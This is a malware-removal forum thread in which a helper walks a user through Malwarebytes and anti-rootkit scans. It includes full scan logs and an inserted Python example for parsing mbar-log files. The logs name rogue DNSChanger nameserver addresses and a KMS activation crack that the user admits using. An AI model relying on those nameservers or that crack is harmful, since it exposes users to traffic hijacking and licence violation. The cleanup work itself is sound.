~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 4

Successfully deleted: C:\ai_recyclebin (Folder)
Successfully deleted: C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_static.re-markable00.re-markable.net_0.localstorage-journal (File)
Successfully deleted: C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_static.re-markable00.re-markable.net_0.localstorage (File)
Successfully deleted: C:\Users\Kym\AppData\Roaming\speedrunnerslog.txt (File)



Registry: 0





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 01-03-16 at 12:36:57.23
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

CKScanner 2.5 - Additional Security Risks - These are not necessarily bad
c:\windows\autokms\autokms.exe
scanner sequence 3.AP.11.PANARZ
----- EOF -----

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 01-03-16
Scan Time: 12:43 PM
Logfile:
Administrator: Yes

Version: 2.2.0.1024
Malware Database: v2016.02.29.05
Rootkit Database: v2016.02.27.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 10
CPU: x64
File System: NTFS
User: Kym

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 375123
Time Elapsed: 3 min, 50 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 13
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\TYPELIB\{43C482BB-F984-4D66-9194-429158BE57E1}, Quarantined, [f980184e4c4df343a6fddcde08fa29d7],
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\INTERFACE\{3361DCDD-E396-4153-AF77-F6AAB54F3CBA}, Quarantined, [f980184e4c4df343a6fddcde08fa29d7],
PUP.Optional.Yontoo, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{3361DCDD-E396-4153-AF77-F6AAB54F3CBA}, Quarantined, [f980184e4c4df343a6fddcde08fa29d7],
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{3361DCDD-E396-4153-AF77-F6AAB54F3CBA}, Quarantined, [f980184e4c4df343a6fddcde08fa29d7],
PUP.Optional.Yontoo, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TYPELIB\{43C482BB-F984-4D66-9194-429158BE57E1}, Quarantined, [f980184e4c4df343a6fddcde08fa29d7],
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\WOW6432NODE\TYPELIB\{43C482BB-F984-4D66-9194-429158BE57E1}, Quarantined, [f980184e4c4df343a6fddcde08fa29d7],
PUP.Optional.AdvancedPCCare, HKLM\SOFTWARE\MICROSOFT\TRACING\advancedpccare_RASAPI32, Quarantined, [a0d9b3b3fd9ce056981b6be312f22fd1],
PUP.Optional.AdvancedPCCare, HKLM\SOFTWARE\MICROSOFT\TRACING\advancedpccare_RASMANCS, Quarantined, [3742264028713df953602a24798ba65a],
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\VC32LDR , Quarantined, [b7c29fc762372b0b875778a3e71d8b75],
PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\INSTALLEDSDB\{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}, Quarantined, [7207c79f6b2e1e18b00668f612f27a86],
PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\INSTALLEDSDB\{cf2797aa-b7ec-e311-8ed9-005056c00008}, Quarantined, [5c1d73f31e7b64d2d0e780de3dc71be5],
PUP.Optional.WinYahoo, HKLM\SOFTWARE\PCV-VARS, Quarantined, [9bdeb5b10792b284f106095a0004f30d],
PUP.Optional.WindowsMangerProtect, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\EVENTLOG\APPLICATION\WindowsMangerProtect, Quarantined, [5b1ee97d21782c0a9a4232eebd470000],

Registry Values: 6
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\chrome.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604858227272555, Quarantined, [7ffaa6c01b7eee48a03d79a254b034cc]
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\explorer.xxx|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604858227272555, Quarantined, [4c2d2a3ce4b572c436a79c7f07fdc937]
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\firefox.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604858227272555, Quarantined, [5f1a94d2c1d86fc722bbd8438b79bf41]
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\iexplore.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604858227272555, Quarantined, [a3d61056ff9a5adccd10be5d877d35cb]
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\VC32Ldr |{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604858227272555, Quarantined, [b7c29fc762372b0b875778a3e71d8b75]
PUP.Optional.WinYahoo, HKLM\SOFTWARE\PCV-VARS|affiliateid, Quarantined, [9bdeb5b10792b284f106095a0004f30d],

Registry Data: 1
Trojan.DNSChanger.DNSRst, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS|NameServer, 82.163.143.171 82.163.142.173, Good: (8.8.8.8), Bad: (82.163.143.171 82.163.142.173),Replaced,[48311e48d6c36ec8783ac13f1fe6cc34]

Folders: 0
(No malicious items detected)

Files: 8
PUP.Optional.BestPriceNinja, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_pstatic.bestpriceninja.com_0.localstorage, Quarantined, [f1886cfa9504d462b6818ad9c24243bd],
PUP.Optional.BestPriceNinja, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_pstatic.bestpriceninja.com_0.localstorage-journal, Quarantined, [75048adcdbbe48ee092e70f312f2e41c],
PUP.Optional.eShopComp, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_pstatic.eshopcomp.com_0.localstorage, Quarantined, [54251a4c8a0f4fe75ac485e3de26f60a],
PUP.Optional.eShopComp, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_pstatic.eshopcomp.com_0.localstorage-journal, Quarantined, [b3c60b5b09901224f12d3a2e3cc88f71],
PUP.Optional.CrossRider, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage, Quarantined, [cdacabbb930658dee19ce08bd430bc44],
PUP.Optional.CrossRider, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage-journal, Quarantined, [1564283e1b7e3bfb4c3157149e66a15f],
PUP.Optional.UTop, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_utop.it_0.localstorage, Quarantined, [a5d4283e1c7da591102e0f652dd7c63a],
PUP.Optional.UTop, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_utop.it_0.localstorage-journal, Quarantined, [1e5b5e0829708caaaf8f660e867eb14f],

Physical Sectors: 0
(No malicious items detected)


(end)

Juliet
2016-03-01, 11:54
c:\windows\autokms\autokms.exe
The above file can be related to a cracked version of Windows or Microsoft Office.
Is your version legit?

Tell me what your computer is doing now?

kym.preston
2016-03-01, 12:05
My version isn't legit, I used a cracked version. However, I do have a legit Windows 7 CD and serial if you think I should reinstall?

Some websites are fine, but others are constantly spammed by ads. Would you like me to send a screenshot?

Juliet
2016-03-01, 12:45
We do not support the use of Pirated-Warez-Keygens-Cracked software.

If seeking help in our Malware removal forum please know that users who have programs obtained by such methods will be asked to remove them, since our help could otherwise be seen as aiding copyright violations. In doing the crack, the 'cracker' has broken the 'End User License Agreement' (EULA) of the product.

You will need to remove your cracked version of Microsoft Office.

~~~~~~~~~~~~~~~~~~~~

Malwarebytes Anti-Rootkit

Download Malwarebytes Anti-Rootkit (http://downloads.malwarebytes.org/file/mbar)
Once the file has been downloaded, right click on the downloaded file and select the Extract all menu option.
Follow the instructions to extract the ZIP file to a folder called mbar-versionnumber on your desktop.
Once the ZIP file has been extracted, open the folder and when that folder opens, double-click on the mbar folder.
Double-click on the mbar.exe file to launch Malwarebytes Anti-Rootkit.
After you double-click on the mbar.exe file, you may receive a User Account Control (UAC) message asking if you are sure you wish to allow the program to run. Please allow it so that Malwarebytes Anti-Rootkit can start correctly.
Malwarebytes Anti-Rootkit will now install necessary drivers that are required for the program to operate correctly.
If you receive a DDA driver message such as "could not load DDA driver", click on the Yes button; Malwarebytes Anti-Rootkit will then restart your computer and start automatically.



On the introduction screen, please click on the Next button to continue.




Next you will see the Update Database screen.
Click on the Update button so Malwarebytes Anti-Rootkit can download the latest definition updates.




When the update has finished, click on the Next button.



Next you can select some basic scanning options. Make sure the Drivers, Sectors, and System scan targets are selected before you click on the Scan button.
Malwarebytes Anti-Rootkit will now start scanning your computer for rootkits. This scan can take some time, so please be patient.




When the scan with Malwarebytes Anti-Rootkit is finished, the program will display a screen with the results from the scan.
Make sure everything is selected and that the option to create a restore point is checked.
Next click on the Cleanup button. Malwarebytes Anti-Rootkit will then prompt you to reboot your computer.
Click on the Yes button to restart your computer.


Two log files will now be created in the mbar folder: system-log.txt and one that starts with mbar-log.
The mbar-log file will always start with mbar-log, but the rest will be named using a timestamp indicating the time it was run.

For example, mbar-log-2012-11-12 (19-13-32).txt corresponds to mbar-log-year-month-day (hour-minute-second).txt.


The system-log.txt contains information about each time you have run MBAR and contains diagnostic information from the program.


~~~~~~~~~~~

I need to see a fresh run of Farbar Recovery Scan Tool.


Right-Click FRST.exe / FRST64.exe and select Run as administrator to run the programme.
Click Yes to the disclaimer.
Ensure the Addition.txt box is checked.
Click the Scan button and let the programme run.
Upon completion, click OK, then OK on the Addition.txt pop up screen.
Two logs (FRST.txt & Addition.txt) will now be open on your Desktop. Copy the contents of both logs and paste in your next reply.
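
The mbar-log naming scheme described in the post above, as an added example that is not part of the original thread or of Malwarebytes' own tooling: Python code that picks the most recent mbar-log from a folder listing by the timestamp in its name and tallies the "... Detected: N" summary lines of a log. The function names, the folder listing and the log excerpt are constructed for illustration; the line format follows the MBAR log posted in this thread.

```python
import re
from datetime import datetime

# Naming scheme from the post: mbar-log-year-month-day (hour-minute-second).txt
LOG_NAME = re.compile(
    r"^mbar-log-(\d{4})-(\d{2})-(\d{2}) \((\d{2})-(\d{2})-(\d{2})\)\.txt$",
    re.IGNORECASE,
)

# Summary lines in an MBAR log look like "Registry Keys Detected: 0".
SECTION = re.compile(r"^(?P<name>[A-Za-z ]+?) Detected: (?P<count>\d+)$")

# Constructed folder listing (assumption): two valid logs, the system log,
# one name with an impossible month and one unrelated file.
SAMPLE_LISTING = [
    "system-log.txt",
    "mbar-log-2012-11-12 (19-13-32).txt",
    "mbar-log-2016-03-01 (21-58-00).txt",
    "mbar-log-2016-13-01 (21-58-00).txt",
    "mbar-log-notes.txt",
]

# Constructed log excerpt (assumption) with non-zero counts so the tally
# has something to flag; real logs carry more sections.
SAMPLE_LOG = """\
Scan type: Quick scan
Objects scanned: 392185

Memory Processes Detected: 0
(No malicious items detected)

Registry Keys Detected: 2
Registry Data Items Detected: 1
Files Detected: 0
(No malicious items detected)

(end)
"""


def parse_log_name(filename):
    """Return the run time encoded in an mbar-log file name, or None."""
    match = LOG_NAME.match(filename)
    if not match:
        return None
    try:
        return datetime(*(int(part) for part in match.groups()))
    except ValueError:
        # Matches the pattern but is not a real date (e.g. month 13).
        return None


def newest_log(filenames):
    """Pick the latest mbar-log by the timestamp in its name.

    The name is used instead of the file's modification time because
    copying or unzipping a log resets mtime but not the name.
    """
    dated = [(parse_log_name(name), name) for name in filenames]
    dated = [(stamp, name) for stamp, name in dated if stamp is not None]
    return max(dated)[1] if dated else None


def detection_counts(log_text):
    """Map each '<section> Detected: N' summary line to its count."""
    counts = {}
    for line in log_text.splitlines():
        match = SECTION.match(line.strip())
        if match:
            counts[match.group("name")] = int(match.group("count"))
    return counts


def flagged_sections(log_text):
    """Return the sections with at least one detection, in log order."""
    return [name for name, n in detection_counts(log_text).items() if n > 0]


if __name__ == "__main__":
    print("newest log:", newest_log(SAMPLE_LISTING))
    for section, count in detection_counts(SAMPLE_LOG).items():
        print(f"{section}: {count}")
    print("needs review:", flagged_sections(SAMPLE_LOG))
```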

kym.preston
2016-03-01, 13:20
The Malwarebytes Anti-Rootkit finished the scan and said "Scan Finished: No malware found!".

Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
main: v2016.03.01.04
rootkit: v2016.02.27.01

Windows 10 x64 NTFS
Internet Explorer 11.0.10240.16683
Kym :: KYM-PC [administrator]

01-03-16 9:58:00 PM
mbar-log-2016-03-01 (21-58-00).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 392185
Time elapsed: 10 minute(s), 43 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

Physical Sectors Detected: 0
(No malicious items detected)

(end)

---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.09.3.1001

(c) Malwarebytes Corporation 2011-2012

OS version: 10.0.9200 Windows 10 x64

Account is Administrative

Internet Explorer version: 11.0.10240.16683

File system is: NTFS
Disk drives: C:\ DRIVE_FIXED, D:\ DRIVE_FIXED, F:\ DRIVE_FIXED
CPU speed: 3.392000 GHz
Memory total: 17061519360, free: 14123868160

Downloaded database version: v2016.03.01.04
Downloaded database version: v2016.02.27.01
Downloaded database version: v2016.02.22.02
=======================================
Initializing...
Driver version: 0.3.0.4
------------ Kernel report ------------
03/01/2016 21:57:55
------------ Loaded modules -----------
----------- End -----------
Done!

Scan started
Database versions:
main: v2016.03.01.04
rootkit: v2016.02.27.01

<<<2>>>
Physical Sector Size: 512
Drive: 1, DevicePointer: 0xffffe0001f007060, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\disk\
--------- Disk Stack ------
DevicePointer: 0xffffe0001f008300, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xffffe0001f007060, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\disk\
DevicePointer: 0xffffe0001ca1e690, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xffffe0001ca23040, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xffffe0001ca22060, DeviceName: \Device\00000030\, DriverName: \Driver\iaStorA\
------------ End ----------
Alternate DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...
Done!
Physical Sector Size: 512
Drive: 0, DevicePointer: 0xffffe0001f009060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\
--------- Disk Stack ------
DevicePointer: 0xffffe0001f009b10, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xffffe0001f009060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\
DevicePointer: 0xffffe0001ca1ae40, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xffffe0001ca23760, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xffffe0001ca26060, DeviceName: \Device\0000002f\, DriverName: \Driver\iaStorA\
------------ End ----------
Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
Drive 0
Scanning MBR on drive 0...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: 4E0A8E17

Partition information:

Partition 0 type is Primary (0x7)
Partition is NOT ACTIVE.
Partition starts at LBA: 206848 Numsec = 1953312768
Partition is not bootable
Partition file system is NTFS

Partition 1 type is Empty (0x0)
Partition is NOT ACTIVE.
Partition starts at LBA: 0 Numsec = 0
Partition is not bootable

Partition 2 type is Empty (0x0)
Partition is NOT ACTIVE.
Partition starts at LBA: 0 Numsec = 0
Partition is not bootable

Partition 3 type is Empty (0x0)
Partition is NOT ACTIVE.
Partition starts at LBA: 0 Numsec = 0
Partition is not bootable

Disk Size: 1000204886016 bytes
Sector size: 512 bytes

Done!
Drive 1
This is a System drive
Scanning MBR on drive 1...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: 4B95E549

Partition information:

Partition 0 type is Primary (0x7)
Partition is ACTIVE.
Partition starts at LBA: 206848 Numsec = 234232752
Partition is bootable
Partition file system is NTFS

Partition 1 type is Empty (0x0)
Partition is NOT ACTIVE.
Partition starts at LBA: 0 Numsec = 0
Partition is not bootable

Partition 2 type is Empty (0x0)
Partition is NOT ACTIVE.
Partition starts at LBA: 0 Numsec = 0
Partition is not bootable

Partition 3 type is Empty (0x0)
Partition is NOT ACTIVE.
Partition starts at LBA: 0 Numsec = 0
Partition is not bootable

Disk Size: 120034123776 bytes
Sector size: 512 bytes

Done!
Physical Sector Size: 512
Drive: 2, DevicePointer: 0xffffe00020a38060, DeviceName: \Device\Harddisk2\DR2\, DriverName: \Driver\disk\
--------- Disk Stack ------
DevicePointer: 0xffffe00020a38b10, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xffffe00020a38060, DeviceName: \Device\Harddisk2\DR2\, DriverName: \Driver\disk\
DevicePointer: 0xffffe00020a07b10, DeviceName: \Device\00000041\, DriverName: \Driver\USBSTOR\
------------ End ----------
Alternate DeviceName: \Device\Harddisk2\DR2\, DriverName: \Driver\disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
Drive 2
Scanning MBR on drive 2...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: 908BDE7D

Partition information:

Partition 0 type is Primary (0x7)
Partition is NOT ACTIVE.
Partition starts at LBA: 2048 Numsec = 3907027116
Partition is not bootable
Partition file system is NTFS

Partition 1 type is Empty (0x0)
Partition is NOT ACTIVE.
Partition starts at LBA: 0 Numsec = 0
Partition is not bootable

Partition 2 type is Empty (0x0)
Partition is NOT ACTIVE.
Partition starts at LBA: 0 Numsec = 0
Partition is not bootable

Partition 3 type is Empty (0x0)
Partition is NOT ACTIVE.
Partition starts at LBA: 0 Numsec = 0
Partition is not bootable

Disk Size: 2000398933504 bytes
Sector size: 512 bytes

Done!
Physical Sector Size: 0
Drive: 3, DevicePointer: 0xffffe00021920060, DeviceName: \Device\Harddisk3\DR3\, DriverName: \Driver\disk\
--------- Disk Stack ------
DevicePointer: 0xffffe00021920b10, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xffffe00021920060, DeviceName: \Device\Harddisk3\DR3\, DriverName: \Driver\disk\
DevicePointer: 0xffffe000209bfb10, DeviceName: \Device\00000047\, DriverName: \Driver\USBSTOR\
------------ End ----------
File "C:\WINDOWS\System32\wshqos.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WSHTCPIP.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wship6.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\hid.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\cabinet.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\mscoree.dll" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\clr.dll" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\clr.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\MSVCR120_CLR0400.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\MSVCR120_CLR0400.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\mscorlib\68b0897c4cade2a6a72889bff2bd0904\MSCORLIB.NI.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\mscorlib\68b0897c4cade2a6a72889bff2bd0904\MSCORLIB.NI.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\clrjit.dll" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\clrjit.dll" is sparse (flags = 32768)
File "C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System\141950bbb0b97c04e39b8c1097eb38b4\System.ni.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dbghelp.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dbgcore.dll" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSVCHOST.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\sihost.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\sihost.exe" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework64\v3.0\WPF\PRESENTATIONFONTCACHE.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\explorer.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\TASKHOSTW.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\RUNTIMEBROKER.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\RUNTIMEBROKER.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\SHELLEXPERIENCEHOST.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\SHELLEXPERIENCEHOST.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\SEARCHINDEXER.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\usp10.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\credui.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\pdh.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ntdsapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DWrite.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\AudioSes.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\AudioSes.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WinTypes.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\MMDevAPI.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\Wpc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\MSVCP_WIN.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ucrtbase.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DIRECTMANIPULATION.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DIRECTMANIPULATION.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DATAEXCHANGE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\d2d1.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\d3d11.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dcomp.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dxgi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\TWINAPI.APPCORE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\TWINAPI.APPCORE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\EXPLORERFRAME.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\bthprops.cpl" is sparse (flags = 32768)
File "C:\WINDOWS\System32\BLUETOOTHAPIS.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\mscms.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\linkinfo.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WINDOWS.STORAGE.SEARCH.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WINDOWS.STORAGE.SEARCH.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\edputil.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\POLICYMANAGER.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\MSVCP110_WIN.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\xmllite.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ntshrui.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\samlib.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\twinapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\actxprxy.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\devenum.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msdmo.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\Speech\Common\sapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\Speech\Common\sapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msacm32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\avrt.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\coml2.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WINDOWSCODECS.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\THUMBCACHE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\shdocvw.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\mfplat.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\RTWorkQ.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\MSMPEG2VDEC.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\MSMPEG2VDEC.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\MFPERFHELPER.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msvproc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\D3DCOMPILER_47.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\d3d9.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dxva2.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\mf.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\mfcore.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ksuser.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\snmpapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\inetmib1.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\cryptui.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wbem\wbemprox.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dsparse.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dsound.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\UIAUTOMATIONCORE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\UIAUTOMATIONCORE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\atlthunk.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\FONTDRVHOST.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\FONTDRVHOST.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wbem\unsecapp.exe" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WPF\WPFGFX_V0400.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WPF\WPFGFX_V0400.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WPF\PRESENTATIONNATIVE_V0400.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WPF\PRESENTATIONNATIVE_V0400.DLL" is sparse (flags = 32768)
